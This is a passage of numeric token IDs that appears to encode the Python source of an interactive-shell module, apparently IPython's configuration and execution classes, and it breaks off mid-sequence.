9967, 13, 2618, 58, 12, 16, 60, 796, 8229, 7, 12957, 31937, 13, 8367, 8, 198, 220, 220, 220, 6468, 13, 13049, 62, 45688, 62, 17946, 602, 7, 21048, 8, 198, 220, 220, 220, 1441, 5509, 198, 2, 10097, 32501, 198, 2, 40713, 874, 198, 2, 10097, 32501, 198, 198, 2, 14102, 40364, 862, 329, 8295, 521, 298, 4542, 198, 9395, 298, 62, 260, 796, 302, 13, 5589, 576, 7, 81, 6, 61, 59, 82, 10, 40225, 91, 61, 59, 82, 10, 7783, 91, 61, 59, 82, 10, 6603, 11537, 198, 198, 2, 10097, 32501, 198, 2, 41086, 198, 2, 10097, 32501, 198, 198, 31, 917, 420, 198, 4299, 2705, 13200, 7, 7753, 11, 649, 8367, 2599, 198, 220, 220, 220, 37227, 13379, 798, 422, 2438, 13, 9078, 11, 284, 4781, 262, 20203, 37811, 628, 220, 220, 220, 1468, 8367, 796, 657, 198, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1468, 8367, 796, 2393, 13, 4215, 13200, 198, 220, 220, 220, 2845, 3460, 4163, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2393, 13, 4215, 13200, 796, 649, 8367, 198, 220, 220, 220, 2845, 357, 33682, 12331, 11, 5994, 12331, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 366, 42348, 12, 1203, 2134, 1, 393, 366, 961, 12, 8807, 12608, 1, 198, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 1441, 1468, 8367, 198, 198, 31, 917, 420, 628, 198, 198, 4299, 651, 62, 12286, 62, 4033, 669, 33529, 198, 220, 220, 220, 366, 46162, 38827, 11617, 1, 198, 220, 220, 220, 9828, 10786, 1136, 62, 12286, 62, 8043, 318, 39224, 1201, 6101, 7535, 642, 13, 15, 11, 290, 5860, 4600, 8199, 6815, 63, 319, 477, 9554, 2637, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 8931, 5715, 28, 17, 8, 198, 220, 220, 220, 1441, 705, 8199, 6815, 6, 628, 198, 4871, 8621, 30748, 3118, 291, 1098, 7, 3118, 291, 1098, 2599, 198, 220, 220, 220, 374, 37811, 32, 34371, 47611, 284, 26571, 4553, 62, 259, 11, 4553, 62, 448, 11, 3503, 13, 628, 220, 220, 220, 770, 318, 257, 34371, 1912, 16708, 326, 26161, 705, 15, 6, 3784, 7061, 290, 7559, 6, 6852, 77, 6, 3784, 6, 59, 77, 6, 15506, 13, 198, 220, 220, 220, 37227, 628, 198, 31, 917, 420, 198, 4871, 360, 13513, 5841, 7, 15252, 2599, 198, 220, 220, 220, 37227, 32, 31548, 8265, 973, 329, 6101, 7535, 338, 14333, 8265, 618, 198, 220, 220, 220, 257, 25745, 1276, 307, 8686, 284, 262, 8265, 338, 11593, 11600, 834, 526, 15931, 198, 220, 220, 220, 11593, 16684, 834, 796, 6045, 628, 198, 4871, 37497, 12360, 7, 15252, 2599, 198, 220, 220, 220, 37227, 464, 7159, 973, 329, 257, 869, 284, 1058, 76, 2788, 25, 63, 9492, 5275, 23248, 13, 5143, 62, 3846, 63, 628, 220, 220, 220, 41835, 1321, 546, 644, 318, 1016, 284, 1645, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 8246, 62, 3846, 796, 6045, 198, 220, 220, 220, 3650, 62, 23569, 796, 10352, 198, 220, 220, 220, 10574, 796, 10352, 198, 220, 220, 220, 7582, 62, 69, 315, 942, 796, 6407, 628, 198, 4871, 37497, 23004, 7, 15252, 2599, 198, 220, 220, 220, 37227, 464, 1255, 286, 257, 869, 284, 1058, 76, 2788, 25, 63, 9492, 5275, 23248, 13, 5143, 62, 3846, 63, 628, 220, 220, 220, 41835, 1321, 546, 644, 1718, 1295, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 9706, 62, 9127, 796, 6045, 198, 220, 220, 220, 4049, 62, 19052, 62, 18558, 796, 6045, 198, 220, 220, 220, 4049, 62, 259, 62, 18558, 796, 6045, 198, 220, 220, 220, 7508, 796, 6045, 198, 220, 220, 220, 1255, 796, 6045, 628, 220, 220, 220, 2488, 26745, 628, 220, 220, 220, 825, 5298, 62, 18224, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 49, 8607, 2696, 4049, 611, 4600, 13138, 63, 318, 4600, 25101, 47671, 4306, 857, 2147, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 18224, 62, 19052, 62, 18558, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 2116, 13, 18224, 62, 19052, 62, 18558, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 18224, 62, 259, 62, 18558, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 2116, 13, 18224, 62, 259, 62, 18558, 628, 198, 4871, 21365, 23248, 7, 29974, 10565, 16934, 11970, 2599, 198, 220, 220, 220, 37227, 2025, 13105, 11, 14333, 7582, 329, 11361, 526, 15931, 628, 220, 220, 220, 4808, 39098, 796, 6045, 628, 220, 220, 220, 6468, 62, 35636, 364, 796, 7343, 26933, 4357, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 317, 1351, 286, 6468, 13, 19667, 8291, 16354, 47611, 10245, 11, 543, 481, 307, 5625, 198, 220, 220, 220, 220, 220, 220, 220, 284, 2836, 5128, 878, 2438, 318, 1057, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 1960, 420, 439, 796, 2039, 388, 19510, 15, 11, 16, 11, 17, 828, 4277, 62, 8367, 28, 15, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 6889, 6101, 7535, 6338, 869, 597, 869, 540, 2134, 772, 611, 345, 1422, 470, 198, 220, 220, 220, 220, 220, 220, 220, 2099, 7952, 46672, 13, 1114, 1672, 11, 705, 2536, 5946, 6, 4329, 705, 2536, 7, 3559, 33047, 198, 220, 220, 220, 220, 220, 220, 220, 6338, 13, 383, 1988, 460, 307, 705, 15, 6, 284, 15560, 262, 3895, 11, 705, 16, 6, 329, 198, 220, 220, 220, 220, 220, 220, 220, 705, 27004, 6, 1960, 420, 439, 11, 810, 340, 318, 407, 5625, 611, 612, 389, 645, 517, 198, 220, 220, 220, 220, 220, 220, 220, 7159, 319, 262, 1627, 11, 290, 705, 17, 6, 329, 705, 12853, 6, 1960, 420, 439, 11, 810, 477, 869, 540, 198, 220, 220, 220, 220, 220, 220, 220, 5563, 389, 6338, 1444, 357, 10197, 611, 645, 7159, 389, 1944, 737, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 8295, 521, 298, 796, 347, 970, 7, 17821, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 11160, 521, 298, 6101, 7535, 2438, 5982, 9427, 2280, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 8295, 707, 4548, 796, 347, 970, 7, 17821, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 17406, 4142, 1057, 25507, 2643, 287, 262, 1353, 1241, 2186, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 9052, 62, 16737, 62, 8899, 796, 90, 198, 220, 220, 220, 220, 220, 220, 220, 705, 292, 13361, 952, 10354, 28264, 292, 13361, 952, 62, 16737, 11, 6407, 828, 198, 220, 220, 220, 220, 220, 220, 220, 705, 22019, 952, 10354, 28264, 22019, 952, 62, 16737, 11, 6407, 828, 198, 220, 220, 220, 220, 220, 220, 220, 705, 83, 27250, 10354, 28264, 83, 27250, 62, 16737, 11, 6407, 828, 198, 220, 220, 220, 220, 220, 220, 220, 705, 27261, 10354, 44104, 7752, 12003, 62, 27261, 62, 16737, 11, 10352, 8, 198, 220, 220, 220, 1782, 628, 220, 220, 220, 9052, 62, 16737, 796, 4377, 7, 12286, 62, 8367, 2625, 4061, 7535, 13, 7295, 13, 3849, 529, 1083, 12758, 13557, 292, 13361, 952, 62, 16737, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 1249, 62, 23108, 28, 17821, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15931, 17563, 262, 9052, 17490, 326, 481, 307, 973, 284, 12260, 1353, 12, 5715, 39354, 2438, 37811, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2488, 12286, 10786, 26268, 62, 16737, 11537, 628, 220, 220, 220, 2488, 12102, 378, 10786, 26268, 62, 16737, 11537, 628, 220, 220, 220, 3557, 9083, 796, 347, 970, 7, 17821, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 27882, 5536, 9729, 284, 307, 1444, 1231, 262, 3756, 4064, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 17625, 16, 796, 34371, 7, 12286, 62, 3820, 1008, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15931, 464, 636, 286, 262, 17625, 284, 307, 10398, 878, 262, 7034, 37811, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 17625, 17, 796, 34371, 10786, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15931, 464, 636, 286, 262, 17625, 284, 307, 10398, 706, 262, 7034, 37811, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 12940, 62, 7857, 796, 34142, 7, 12825, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5345, 262, 2546, 286, 262, 5072, 12940, 13, 220, 383, 4277, 318, 8576, 11, 345, 460, 198, 220, 220, 220, 220, 220, 220, 220, 1487, 340, 15043, 287, 534, 4566, 2393, 13, 220, 25700, 340, 284, 657, 3190, 198, 220, 220, 220, 220, 220, 220, 220, 595, 2977, 262, 40918, 1080, 11, 290, 262, 5288, 1988, 6292, 318, 513, 357, 361, 198, 220, 220, 220, 220, 220, 220, 220, 345, 2148, 257, 1988, 1342, 621, 513, 11, 340, 318, 13259, 284, 657, 290, 257, 6509, 318, 198, 220, 220, 220, 220, 220, 220, 220, 4884, 737, 220, 770, 4179, 318, 5447, 780, 4306, 345, 1183, 4341, 517, 198, 220, 220, 220, 220, 220, 220, 220, 640, 302, 12, 2704, 8023, 257, 1165, 1402, 12940, 621, 1762, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 3124, 62, 10951, 796, 347, 970, 7, 17821, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5765, 7577, 329, 19407, 1321, 546, 5563, 13, 4362, 428, 198, 220, 220, 220, 220, 220, 220, 220, 1321, 318, 3804, 832, 257, 279, 3536, 357, 2339, 705, 1203, 33809, 290, 617, 279, 10321, 198, 220, 220, 220, 220, 220, 220, 220, 651, 10416, 351, 3124, 12416, 11, 428, 12971, 460, 307, 2900, 572, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 7577, 796, 11294, 5321, 13290, 4834, 388, 7, 10786, 8199, 6815, 3256, 705, 2949, 10258, 41707, 15047, 40469, 41707, 19314, 33809, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4277, 62, 8367, 11639, 8199, 6815, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 7248, 262, 3124, 7791, 357, 2949, 10258, 11, 25627, 11, 7020, 11, 393, 4401, 40469, 21387, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 14257, 796, 347, 970, 7, 25101, 737, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 15560, 62, 69, 11608, 62, 7353, 62, 41049, 796, 347, 970, 7, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 3987, 470, 869, 1281, 12, 41049, 5499, 326, 423, 4054, 287, 262, 1613, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 3359, 62, 687, 1436, 796, 2262, 590, 7, 23114, 8479, 1436, 11, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 3359, 25480, 62, 4871, 796, 5994, 7, 23114, 39, 566, 8, 198, 220, 220, 220, 3359, 62, 12984, 62, 4871, 796, 5994, 7, 23114, 46471, 8, 198, 220, 220, 220, 17050, 62, 4871, 796, 5994, 7, 34, 8103, 7293, 5329, 8, 628, 220, 220, 220, 599, 20079, 87, 1958, 62, 15390, 8841, 796, 347, 970, 7, 25101, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2039, 2977, 5527, 27711, 10552, 286, 2205, 37336, 13, 357, 1212, 4433, 262, 198, 220, 220, 220, 220, 220, 220, 220, 2205, 260, 1050, 8265, 737, 198, 220, 220, 220, 220, 220, 220, 220, 13538, 11074, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2488, 672, 2655, 303, 7203, 82, 746, 28413, 1958, 62, 15390, 8841, 4943, 628, 220, 220, 220, 7139, 62, 6494, 62, 79, 3536, 796, 347, 970, 7, 25101, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 357, 2964, 10178, 282, 7824, 8, 13536, 27711, 10552, 287, 285, 524, 36344, 1908, 198, 220, 220, 220, 220, 220, 220, 220, 284, 279, 10321, 13, 198, 220, 220, 220, 220, 220, 220, 220, 13538, 11074, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2488, 672, 2655, 303, 7203, 21633, 62, 6494, 62, 79, 3536, 4943, 628, 220, 220, 220, 1366, 62, 12984, 62, 4871, 796, 6045, 628, 220, 220, 220, 8420, 62, 2197, 796, 347, 970, 7, 25101, 8, 198, 220, 220, 220, 409, 2676, 796, 2262, 590, 7, 30337, 16541, 420, 439, 8, 198, 220, 220, 220, 2488, 12286, 10786, 1069, 2676, 11537, 198, 220, 220, 220, 1303, 2892, 18970, 1146, 3649, 9706, 3753, 198, 220, 220, 220, 9706, 62, 9127, 796, 34142, 7, 16, 8, 198, 220, 220, 220, 29472, 796, 34371, 7203, 27, 541, 7535, 8624, 29, 4943, 198, 220, 220, 220, 20966, 7535, 62, 15908, 28, 34371, 7, 7061, 737, 12985, 7, 11250, 28, 17821, 8, 1303, 5345, 284, 651, 62, 541, 7535, 62, 15908, 3419, 287, 11593, 15003, 834, 628, 220, 220, 220, 1303, 16718, 284, 6121, 4778, 878, 2491, 606, 11, 290, 2198, 1771, 2438, 318, 1844, 198, 220, 220, 220, 5128, 62, 7645, 16354, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 15414, 7645, 16354, 17, 13, 8291, 16354, 13511, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 32865, 628, 220, 220, 220, 2488, 26745, 628, 220, 220, 220, 5128, 62, 35636, 364, 62, 7353, 796, 7343, 26933, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 32, 1351, 286, 4731, 5128, 6121, 364, 11, 284, 307, 5625, 706, 6101, 7535, 338, 366, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 593, 5128, 38226, 526, 198, 220, 220, 220, 1267, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 5128, 62, 22018, 1967, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 12050, 428, 1695, 329, 19528, 17764, 357, 3866, 12, 22, 13, 15, 2650, 8, 351, 4683, 2438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1114, 1672, 11, 20966, 88, 33885, 20966, 88, 33885, 3058, 3544, 198, 220, 220, 220, 220, 220, 220, 220, 4600, 29149, 13, 15414, 62, 22018, 1967, 13, 9122, 62, 20751, 63, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 422, 14601, 1330, 9828, 198, 220, 220, 220, 220, 220, 220, 220, 9828, 7203, 63, 15414, 62, 22018, 1967, 63, 318, 39224, 1201, 6101, 7535, 767, 13, 15, 11, 4702, 4600, 15414, 62, 7645, 16354, 62, 37153, 63, 33283, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 8931, 5715, 28, 17, 198, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 15414, 62, 7645, 16354, 62, 37153, 628, 220, 220, 220, 2604, 9688, 796, 347, 970, 7, 25101, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 7253, 18931, 284, 262, 4277, 2604, 2393, 287, 49312, 4235, 13, 198, 220, 220, 220, 220, 220, 220, 220, 5765, 4600, 6404, 33295, 63, 284, 11986, 257, 2604, 2393, 284, 12429, 33295, 1174, 17259, 284, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 2604, 7753, 796, 34371, 10786, 3256, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 2604, 7753, 284, 779, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 2604, 33295, 796, 34371, 10786, 3256, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 7253, 18931, 284, 262, 1813, 2393, 287, 24443, 4235, 13, 198, 220, 220, 220, 220, 220, 220, 220, 5765, 4600, 6404, 7753, 63, 284, 11986, 257, 2604, 2393, 284, 12429, 2502, 13564, 1174, 17259, 284, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 2134, 62, 10951, 62, 8841, 62, 5715, 796, 2039, 388, 19510, 15, 11, 16, 11, 17, 828, 4277, 62, 8367, 28, 15, 11, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 279, 9945, 796, 347, 970, 7, 25101, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 17406, 4142, 869, 262, 279, 9945, 49518, 706, 790, 6631, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 3359, 62, 7700, 796, 347, 970, 7, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15931, 1532, 6407, 11, 1997, 326, 561, 307, 3804, 284, 262, 279, 3536, 198, 220, 220, 220, 220, 220, 220, 220, 481, 307, 9066, 355, 3218, 5072, 2427, 526, 15931, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 1303, 39224, 6152, 12796, 25, 628, 220, 220, 220, 6152, 62, 259, 16, 796, 34371, 10786, 818, 685, 6852, 2, 5974, 46083, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 12156, 31023, 1201, 6101, 7535, 604, 13, 15, 290, 9514, 1201, 642, 13, 15, 11, 900, 24523, 9492, 5275, 23248, 13, 16963, 457, 82, 2134, 3264, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 6152, 62, 259, 17, 796, 34371, 10786, 220, 220, 764, 6852, 35, 11207, 46083, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 12156, 31023, 1201, 6101, 7535, 604, 13, 15, 290, 9514, 1201, 642, 13, 15, 11, 900, 24523, 9492, 5275, 23248, 13, 16963, 457, 82, 2134, 3264, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 6152, 62, 448, 796, 34371, 10786, 7975, 58, 6852, 2, 5974, 46083, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 12156, 31023, 1201, 6101, 7535, 604, 13, 15, 290, 9514, 1201, 642, 13, 15, 11, 900, 24523, 9492, 5275, 23248, 13, 16963, 457, 82, 2134, 3264, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 36454, 62, 15636, 62, 9464, 796, 347, 970, 7, 17821, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 12156, 31023, 1201, 6101, 7535, 604, 13, 15, 290, 9514, 1201, 642, 13, 15, 11, 900, 24523, 9492, 5275, 23248, 13, 16963, 457, 82, 2134, 3264, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2488, 672, 2655, 303, 10786, 16963, 457, 62, 259, 16, 3256, 705, 16963, 457, 62, 259, 17, 3256, 705, 16963, 457, 62, 448, 3256, 705, 16963, 457, 62, 15636, 62, 9464, 11537, 628, 220, 220, 220, 905, 62, 1809, 9108, 62, 15414, 796, 347, 970, 7, 17821, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15307, 30101, 5128, 11, 304, 13, 70, 13, 329, 1960, 420, 439, 526, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 5897, 796, 347, 970, 7, 25101, 737, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2106, 62, 13664, 796, 34142, 7, 49388, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1037, 11639, 14957, 4129, 286, 3141, 2106, 6, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 2106, 62, 2220, 62, 13664, 796, 34142, 7, 12825, 11, 1037, 28, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 1271, 286, 7448, 2106, 12784, 284, 307, 9639, 198, 220, 220, 220, 220, 220, 220, 220, 656, 262, 2106, 11876, 379, 13693, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 6468, 62, 17440, 62, 3849, 21797, 796, 2039, 388, 7, 17816, 439, 3256, 705, 12957, 3256, 705, 12957, 62, 31937, 3256, 705, 23108, 3256, 705, 12957, 62, 31937, 62, 273, 62, 562, 570, 6, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4277, 62, 8367, 11639, 12957, 62, 31937, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 705, 439, 3256, 705, 12957, 3256, 705, 12957, 62, 31937, 6, 393, 705, 23108, 3256, 705, 12957, 62, 31937, 62, 273, 62, 562, 570, 6, 31577, 198, 220, 220, 220, 220, 220, 220, 220, 543, 13760, 815, 307, 1057, 9427, 2280, 357, 13812, 278, 5072, 422, 14700, 737, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 1303, 16926, 46, 25, 428, 636, 286, 6152, 4542, 815, 307, 3888, 284, 262, 2166, 2412, 13, 198, 220, 220, 220, 1303, 5765, 2183, 4759, 270, 31431, 326, 10385, 705, 15, 6, 3784, 7061, 290, 705, 6852, 77, 6, 3784, 6, 59, 77, 6, 198, 220, 220, 220, 4553, 62, 259, 796, 8621, 30748, 3118, 291, 1098, 10786, 59, 77, 27691, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 4553, 62, 448, 796, 8621, 30748, 3118, 291, 1098, 7, 7061, 737, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 4553, 62, 448, 17, 796, 8621, 30748, 3118, 291, 1098, 7, 7061, 737, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 4295, 27761, 62, 7442, 62, 30176, 796, 347, 970, 7, 17821, 737, 12985, 7, 11250, 28, 17821, 8, 198, 220, 220, 220, 2124, 14171, 796, 11294, 5321, 13290, 4834, 388, 7, 10786, 21947, 3256, 705, 3646, 391, 3256, 705, 13414, 65, 577, 3256, 705, 9452, 4402, 33809, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4277, 62, 8367, 11639, 21947, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1037, 2625, 38978, 12881, 329, 262, 6101, 7535, 6631, 32847, 526, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6739, 12985, 7, 11250, 28, 17821, 8, 628, 220, 220, 220, 1303, 3834, 5589, 3906, 286, 21365, 23248, 198, 220, 220, 220, 16144, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 26011, 13, 40489, 13511, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 7694, 346, 353, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 3866, 24455, 13, 36698, 346, 353, 13511, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 3170, 259, 62, 46670, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 18780, 259, 62, 46670, 13, 39582, 259, 51, 2416, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 3359, 62, 46670, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 13812, 62, 46670, 13, 23114, 51, 2416, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 7552, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 2302, 5736, 13, 11627, 3004, 13511, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 21437, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 15577, 2220, 13, 19197, 2220, 13511, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 2106, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 23569, 13, 18122, 15457, 273, 14881, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 2153, 873, 62, 37153, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 32707, 13, 13436, 873, 13511, 3256, 1249, 62, 23108, 28, 17821, 8, 628, 220, 220, 220, 7034, 62, 15908, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 31438, 13, 37046, 35277, 3256, 1249, 62, 23108, 28, 17821, 8, 198, 220, 220, 220, 2488, 26745, 628, 198, 220, 220, 220, 1303, 15348, 7071, 198, 220, 220, 220, 4808, 7353, 62, 41049, 796, 360, 713, 3419, 628, 220, 220, 220, 1303, 42259, 597, 25757, 9052, 9639, 329, 279, 2645, 397, 198, 220, 220, 220, 279, 2645, 397, 62, 48317, 62, 19738, 796, 6045, 628, 220, 220, 220, 938, 62, 18558, 1009, 62, 82, 1229, 2707, 276, 796, 347, 970, 7, 17821, 11, 1037, 11639, 11633, 938, 10945, 3141, 14131, 11537, 628, 220, 220, 220, 938, 62, 18558, 1009, 62, 20274, 796, 2262, 590, 10786, 4061, 7535, 13, 7295, 13, 3849, 529, 1083, 12758, 13, 23002, 1009, 23004, 3256, 1037, 11639, 23004, 286, 23710, 262, 938, 3141, 3256, 1249, 62, 23108, 28, 17821, 8, 628, 220, 220, 220, 825, 651, 62, 541, 7535, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 